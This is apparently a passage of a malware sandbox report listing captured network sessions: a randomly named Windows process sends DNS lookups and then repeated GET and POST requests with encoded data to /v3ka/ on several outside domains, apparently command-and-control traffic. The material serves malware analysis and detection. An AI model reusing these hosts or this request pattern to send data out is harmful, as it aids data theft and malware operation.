                                                                                    Mar 18, 2024 15:10:17.833498001 CET4983680192.168.11.3091.195.240.19
                                                                                    Mar 18, 2024 15:10:18.849159956 CET4983780192.168.11.3091.195.240.19
                                                                                    Mar 18, 2024 15:10:19.030606031 CET804983791.195.240.19192.168.11.30
                                                                                    Mar 18, 2024 15:11:11.948113918 CET5120153192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:11:12.049202919 CET53512011.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:11:17.055088997 CET5527653192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:11:17.184489012 CET53552761.1.1.1192.168.11.30
                                                                                    Mar 18, 2024 15:11:25.240816116 CET6319353192.168.11.301.1.1.1
                                                                                    Mar 18, 2024 15:11:25.371534109 CET53631931.1.1.1192.168.11.30
                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    0 | 192.168.11.30 | 49810 | 172.67.130.3 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:08:35.249447107 CET | 457 | OUT | GET /v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:08:35.354549885 CET | 780 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 14:08:35 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 15:08:35 GMT
                                                                                    Location: https://www.wbyzm5.buzz/v3ka/?c4qx7JIP=5DSEd0ATp85KgzdrFCdxbLJep/S6iKShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChuA8Yf+ZyRKX9C6Zn4U=&K4W=bb2HuFjPIN
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jv%2FfT9lrWRCD23amS7x9d1FNqUDwQ2BiEVr6VX6mjrZfTjPojdPMMAO2AuNjwWu20fWOzU8iNNqCTqGbU%2FEEsCFyneYKQRdyIIF7DIzYq15hG8hUxKzVgztGPksQOX%2BoJBc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665cbac980bc434-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    1 | 192.168.11.30 | 49811 | 82.180.172.14 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:08:45.740180969 CET | 721 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.xiefly.shop
                                                                                    Origin: http://www.xiefly.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.xiefly.shop/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=QPLiKYhL3NQ0IQXmhCuG8kP87wSxrG5QjbSaRn587E1XPMckan7MFObs3HVsPbuRoi1fGXXhFKU39TqGPu2Pr6KYF0TciKE01pTyh/GjjSVdntlQPGeegcRFsQJKIVpISZH/ApRNnfSmdT4hCsocuDIwCbVZ1gILqD/YSqCZzzOVsiwcx7ir0g1A0NVbBH+MVA==
                                                                                    Mar 18, 2024 15:08:45.894922018 CET | 1235 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    last-modified: Thu, 23 Jun 2022 13:08:36 GMT
                                                                                    etag: "999-62b465d4-7483b18151e2685e;br"
                                                                                    accept-ranges: bytes
                                                                                    content-encoding: br
                                                                                    vary: Accept-Encoding
                                                                                    content-length: 912
                                                                                    date: Mon, 18 Mar 2024 14:08:45 GMT
                                                                                    server: LiteSpeed
                                                                                    platform: hostinger


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    2           192.168.11.30  49812        82.180.172.14   80                6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp                            Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:08:48.415607929 CET  741                OUT        POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.xiefly.shop
                                                                                    Origin: http://www.xiefly.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.xiefly.shop/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=QPLiKYhL3NQ0JwnmylCG0kP7+wSxhm5UjbWaRjJs6xdXPtskbiXMJubs/nUmC7ueoi4oGVDhFKA39TaGOdOMrqKaKUTe/aE01pTyh/SFjStdncVQJjydjcRCrQJKMVpMSZHdAsIQncqmdRwhD9ofkDI2fLU3kiNjyQvUctjA/hyBgVBGs4WpnAJtoM4zDF/XID+OEmo2jplLEub5D3MdZ4k=
                                                                                    Mar 18, 2024 15:08:48.570447922 CET  1235               IN         HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    last-modified: Thu, 23 Jun 2022 13:08:36 GMT
                                                                                    etag: "999-62b465d4-7483b18151e2685e;br"
                                                                                    accept-ranges: bytes
                                                                                    content-encoding: br
                                                                                    vary: Accept-Encoding
                                                                                    content-length: 912
                                                                                    date: Mon, 18 Mar 2024 14:08:48 GMT
                                                                                    server: LiteSpeed
                                                                                    platform: hostinger


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    3           192.168.11.30  49814        82.180.172.14   80                6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp                            Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:08:51.102238894 CET  1658               OUT        POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.xiefly.shop
                                                                                    Origin: http://www.xiefly.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.xiefly.shop/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:08:51.257416964 CET  1235               IN         HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    last-modified: Thu, 23 Jun 2022 13:08:36 GMT
                                                                                    etag: "999-62b465d4-7483b18151e2685e;br"
                                                                                    accept-ranges: bytes
                                                                                    content-encoding: br
                                                                                    vary: Accept-Encoding
                                                                                    content-length: 912
                                                                                    date: Mon, 18 Mar 2024 14:08:51 GMT
                                                                                    server: LiteSpeed
                                                                                    platform: hostinger


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    4           192.168.11.30  49815        82.180.172.14   80                6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp                            Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:08:53.774163961 CET  457                OUT        GET /v3ka/?c4qx7JIP=dNjCJvlouN0lJiHjmW6o9laKqXafrGVThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/Jmg62t+iuZuHiG5vvg=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.xiefly.shop
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:08:53.929074049 CET  1286               IN         HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    last-modified: Thu, 23 Jun 2022 13:08:36 GMT
                                                                                    etag: "999-62b465d4-7483b18151e2685e;;;"
                                                                                    accept-ranges: bytes
                                                                                    content-length: 2457
                                                                                    date: Mon, 18 Mar 2024 14:08:53 GMT
                                                                                    server: LiteSpeed
                                                                                    platform: hostinger
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewp
                                                                                    Mar 18, 2024 15:08:53.929173946 CET  1286               IN
                                                                                    Data Ascii: ort" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href
                                                                                    Mar 18, 2024 15:08:53.929220915 CET  164                IN
                                                                                    Data Ascii: x;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </div> </div></body></html>


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    5           192.168.11.30  49816        198.54.117.242  80                6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp                            Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:08:59.288155079 CET  724                OUT        POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Origin: http://www.dreadbed.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.dreadbed.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=3s5zHo3CKggsEAwC2zsJPsCUB5cv1WOPqG6Ezdm9Q8EhrCHtz8adhoTC/JkmP2NPMlAqJQLrZlVCSK5otMOB+pMNzrXWTtRsH7+s8eppsOM67IH6xG+CnJgZ9koH+DxkEcZxGaomt45L8LUjBdMCYSWwUTx0B20y2M+1FXqvHTHZzv1Lo1ldMsdwNWCh5MNobg==
                                                                                    Mar 18, 2024 15:08:59.461024046 CET  324                IN         HTTP/1.1 403 Forbidden
                                                                                    Date: Mon, 18 Mar 2024 14:08:59 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Server: namecheap-nginx
                                                                                    Content-Encoding: gzip


                                                                                    Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                                    6           192.168.11.30  49817        198.54.117.242  80                6944  C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp                            Bytes transferred  Direction  Data
                                                                                    Mar 18, 2024 15:09:01.994524002 CET  744                OUT        POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Origin: http://www.dreadbed.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.dreadbed.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=3s5zHo3CKggsHhAC6wUJKMCbNZcvsmODqG2EzczlQvshogfty9adkoTCwpkvFWMDMlNZJULrZlpCSLlou7aO/5MLo7XudNRsH7+s8fNDsOE67436wjSD55gG+koHozxoEcZfGYdLt+lL8OojBMMBSSWyJDxgBUdVv8XFEl68ODv4/YER12RffMhdRXvJ7OMzGneXCBAAbbKZutQXiuinRqI=
                                                                                    Mar 18, 2024 15:09:02.195728064 CET | 324 | IN | HTTP/1.1 403 Forbidden
                                                                                    Date: Mon, 18 Mar 2024 14:09:02 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Server: namecheap-nginx
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    7 | 192.168.11.30 | 49818 | 198.54.117.242 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:04.706928968 CET | 1661 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Origin: http://www.dreadbed.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.dreadbed.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:04.920751095 CET | 324 | IN | HTTP/1.1 403 Forbidden
                                                                                    Date: Mon, 18 Mar 2024 14:09:04 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Server: namecheap-nginx
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    8 | 192.168.11.30 | 49819 | 198.54.117.242 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:07.414069891 CET | 458 | OUT | GET /v3ka/?c4qx7JIP=6uRTEcONOSwyaRtl3SIdI/7ZcaxdnFD0iGrt2seiEdMiqBKCwYyYvMrO5fxXMQNYUGElLXPpIQYaUrVgpe2t46086L+DcudheMq8m5F90vo+8IbH2nL0hLQ=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.dreadbed.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:07.638802052 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 18 Mar 2024 14:09:07 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Set-Cookie: SessionId=ecde018735e1471a979a5a0a5bd19ed8; domain=.www.namecheap.com; path=/; httponly
                                                                                    Set-Cookie: x-ncpl-csrf=1c05ca0950124b0195eb022290480c8b; domain=.www.namecheap.com; path=/; secure; samesite=none
                                                                                    X-Proxy-Cache: HIT
                                                                                    Server: namecheap-nginx


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    9 | 192.168.11.30 | 49820 | 198.177.123.106 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:13.346460104 CET | 739 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Origin: http://www.stellerechoes.xyz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.stellerechoes.xyz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=LH3rHLbXIwT+CRlroBsYb10Rd9ZcuC/VO7/3O21nDUH76yFoLkrvb3v1bPBLRHDto/tES++lx6XdhgbLY6lYY29t9Xn6jrQMfSSZ3AsuGj6w7ryrgCTszMT8yZWExsa6MEs4MXbCpkXUuVIruONdJaEoJFKo0BAGLYLw47BOA5Ud4pZBroznL8b3pSK/RoQekQ==
                                                                                    Mar 18, 2024 15:09:13.632683039 CET | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 14:09:13 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    10 | 192.168.11.30 | 49821 | 198.177.123.106 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:16.037503004 CET | 759 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Origin: http://www.stellerechoes.xyz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.stellerechoes.xyz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=LH3rHLbXIwT+Cy9rqiEYT10SDtZcni/ZO7z3O3wgDhX77XhoKmDva3v1D/BKfnD2o/R6S/Clx6zdhgLLYNRbYm9j7Xn8nrQMfSSZ3EMIGjiw7bCrhmHt+sT/1ZWE1samMEsaMWHspm/UuQMrub5aQKFCElL75zkPD7fmx5lFAsc7weob2rHlYcna1TnXTqRF5TFbosvWGW3CYa1AAdD7lD0=
                                                                                    Mar 18, 2024 15:09:16.326740980 CET | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 14:09:16 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    11 | 192.168.11.30 | 49822 | 198.177.123.106 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:18.750458956 CET | 1676 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Origin: http://www.stellerechoes.xyz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.stellerechoes.xyz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:19.049846888 CET | 169 | IN | HTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 14:09:18 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    12 | 192.168.11.30 | 49823 | 198.177.123.106 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:21.447671890 CET | 463 | OUT | GET /v3ka/?c4qx7JIP=GFfLE978cTjgJhl6jgUZbEhmCeB5iD6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3hEtYSzM6b6AuWOV5s4=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.stellerechoes.xyz
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:21.735922098 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 14:09:21 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    13 | 192.168.11.30 | 49824 | 194.191.24.38 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:35.300714970 CET | 739 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
                                                                                    Origin: http://www.b-r-consulting.ch
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.b-r-consulting.ch/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Ascii: c4qx7JIP=WZ7pvUHO5mWQLMl9yegDM8VyMl9NssJUj0symIabr3DyYtM3m4xvPM2nXle64ktFTbnuGAxuSxQ5OMJqsXmms2rYdhiin6x6UACxr+3OHWF2nt5e1IXn8oJXtn/WaT7MrNzP1Sz8ec4MefyCO932h9W5udS+4Oy4+v9S8SODR66y0mjT0GR2kjpLuqJpotf27A==
                                                                                    Mar 18, 2024 15:09:35.489181042 CET | 376 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:35 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Encoding: br


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    14 | 192.168.11.30 | 49825 | 194.191.24.38 | 80 | 6944 | C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Mar 18, 2024 15:09:38.013422012 CET | 759 | OUT | POST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
